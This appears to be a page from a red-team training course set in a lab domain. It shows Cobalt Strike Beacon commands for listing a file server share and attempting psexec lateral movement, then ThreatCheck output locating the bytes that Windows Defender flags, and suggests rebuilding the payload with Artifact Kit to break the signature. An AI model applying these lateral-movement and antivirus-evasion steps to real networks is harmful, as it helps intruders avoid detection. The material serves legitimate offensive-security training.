On-Disk Detections

Even though dropping files to disk has a bad reputation, there are instances where it's fairly unavoidable if we want to employ certain tactics. For instance, we can show we have access to the File Server, but we can't PsExec to it because the service binary payload is being detected by Defender.

 beacon> ls \\fs.dev.cyberbotic.io\c$

 Size     Type    Last Modified         Name
 ----     ----    -------------         ----
          dir     09/14/2022 15:44:51   $Recycle.Bin
          dir     08/10/2022 04:55:17   $WinREAgent
          dir     08/10/2022 05:05:53   Boot
          dir     08/18/2021 23:34:55   Documents and Settings
          dir     08/19/2021 06:24:49   EFI
          dir     05/08/2021 08:20:24   PerfLogs
          dir     09/14/2022 15:55:16   Program Files
          dir     08/10/2022 04:06:16   Program Files (x86)
          dir     09/14/2022 15:59:23   ProgramData
          dir     09/14/2022 15:25:23   Recovery
          dir     09/14/2022 15:25:04   System Volume Information
          dir     09/14/2022 15:26:47   Users
          dir     09/14/2022 15:25:15   Windows
 427kb    fil     08/10/2022 05:00:07   bootmgr
 1b       fil     05/08/2021 08:14:33   BOOTNXT
 12kb     fil     09/14/2022 16:00:25   DumpStack.log.tmp
 1gb      fil     09/14/2022 16:00:25   pagefile.sys

beacon> jump psexec64 fs.dev.cyberbotic.io smb
[-] Could not start service 633af16 on fs.dev.cyberbotic.io: 225
PS C:\Users\Attacker> net helpmsg 225

Operation did not complete successfully because the file contains a virus or potentially unwanted software.


If we copy the payload to our local desktop and check the associated log, we can see that the "file" was detected.



Like many AV products, Defender has a database of definitions from which it can detect "known bad" very quickly. We can use a tool like ThreatCheck to (roughly) identify which part of a file Defender dislikes. It achieves this by splitting the file into chunks, writing them into C:\Temp and triggering a manual scan. It will attempt to find the single smallest piece that will trigger a positive detection.

PS C:\Users\Attacker> C:\Tools\ThreatCheck\ThreatCheck\bin\Debug\ThreatCheck.exe -f C:\Payloads\smb_x64.svc.exe
[*] C:\Temp doesn't exist. Creating it...
[+] Target file size: 296960 bytes
[+] Analyzing...
[!] Identified end of bad bytes at offset 0x482EE
00000000   04 00 14 C0 04 00 14 C0  04 00 14 C0 04 00 14 C0   ···A···A···A···A
00000010   04 00 14 C0 04 00 14 C0  04 00 14 C0 04 00 14 C0   ···A···A···A···A
00000020   04 00 14 C0 04 00 14 C0  04 00 14 C0 04 00 14 C0   ···A···A···A···A
00000030   04 00 14 C0 04 00 14 C0  04 00 14 C0 04 00 14 C0   ···A···A···A···A
00000040   04 00 14 C0 04 00 14 C0  04 00 14 C0 04 00 14 C0   ···A···A···A···A
00000050   04 00 14 C0 04 00 14 C0  04 00 14 C0 04 00 14 C0   ···A···A···A···A
00000060   04 00 14 C0 04 00 14 C0  04 00 14 C0 04 00 14 C0   ···A···A···A···A
00000070   04 00 14 C0 04 00 14 C0  04 00 14 C0 04 00 4B 45   ···A···A···A··KE
00000080   52 4E 45 4C 33 32 2E 64  6C 6C 00 00 00 00 28 C0   RNEL32.dll····(A
00000090   04 00 28 C0 04 00 28 C0  04 00 28 C0 04 00 28 C0   ··(A··(A··(A··(A
000000A0   04 00 28 C0 04 00 28 C0  04 00 28 C0 04 00 28 C0   ··(A··(A··(A··(A
000000B0   04 00 28 C0 04 00 28 C0  04 00 28 C0 04 00 28 C0   ··(A··(A··(A··(A
000000C0   04 00 28 C0 04 00 28 C0  04 00 28 C0 04 00 28 C0   ··(A··(A··(A··(A
000000D0   04 00 28 C0 04 00 28 C0  04 00 28 C0 04 00 28 C0   ··(A··(A··(A··(A
000000E0   04 00 28 C0 04 00 28 C0  04 00 28 C0 04 00 28 C0   ··(A··(A··(A··(A
000000F0   04 00 28 C0 04 00 28 C0  04 00 6D 73 76 63 72 74   ··(A··(A··msvcrt

[*] Run time: 5.28s


There's nothing painfully obvious or malicious about this block of data, which would lead me to conclude that it's simply a fixed signature for the default Cobalt Strike Beacon payload. To rebuild the payloads, we can use the Artifact Kit - even building with a different version of gcc can produce enough changes to break this signature.

Last updated